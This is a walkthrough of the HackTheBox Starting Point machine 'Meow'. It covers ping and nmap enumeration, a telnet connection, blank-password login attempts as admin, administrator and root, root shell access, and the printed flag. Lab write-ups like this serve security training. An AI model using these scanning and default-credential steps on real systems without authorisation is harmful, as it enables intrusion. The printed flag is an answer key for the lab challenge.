Post

HackTheBox - Meow

Posted Updated
Meow - HackTheBox
Meow - HackTheBox
By Muhammad Khoirul Huda
3 min read

Meow is one of the Starting Points from HackTheBox, where in CTF Meow we will learn about Telnet.

Introduction

  • Connect Meow using Pwnbox or OpenVPN.
  • Spawn machine.

Enumeration

To check the target connection and port, we can use Ping and Nmap.

Ping

After connect with Meow, then ping Target IP.

1
2
3
4
5
6
7
8
9
10
11
12

❯ ping 10.129.49.190

PING 10.129.49.190 (10.129.49.190) 56(84) bytes of data.
64 bytes from 10.129.49.190: icmp_seq=1 ttl=63 time=778 ms
64 bytes from 10.129.49.190: icmp_seq=2 ttl=63 time=353 ms
64 bytes from 10.129.49.190: icmp_seq=3 ttl=63 time=255 ms
64 bytes from 10.129.49.190: icmp_seq=4 ttl=63 time=566 ms
64 bytes from 10.129.49.190: icmp_seq=5 ttl=63 time=225 ms

--- 10.129.49.190 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4002ms
rtt min/avg/max/mdev = 224.682/435.502/778.336/208.966 ms

Nmap

Scan all open port of target with nmap, -sCV is a combination of -sC and -sV, where -sC displays the script for the port and -sV displays the version info for the port.

1
2
3
4
5
6
7
8
9
10
11
12

❯ nmap -sCV 10.129.49.190

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-24 07:18 WIB
Nmap scan report for JSN.JaringanKU (10.129.49.190)
Host is up (1.2s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.93 seconds

You can see that the open port at 23/tcp is for the Telnet service.

1
2
3
4
5
6
7
8
9
10
11
12

❯ telnet 10.129.49.190

Trying 10.129.49.190...
Connected to 10.129.49.190.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login:

Foothold

We can try login without password using usernames bellow :

  • admin
  • administrator
  • root
1
2
3
4
5
6
7
8
9

Meow login: admin
Password: 

Login incorrect
Meow login: administrator
Password: 

Login incorrect
meow login:

Telnet

Last try we can use root username.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 24 Dec 2023 12:32:04 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             136
  Users logged in:       0
  IPv4 address for eth0: 10.129.49.190
  IPv6 address for eth0: dead:beef::250:56ff:fe96:4e0a

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0

root@Meow:~#

Once we get into Telnet from the target, let’s look for the flag.

1
2
3
4
5

root@Meow:~# ls
flag.txt  snap

root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
HackTheBox, Starting Point
misc telnet very_easy hackthebox
This post is licensed under CC BY 4.0 by the author.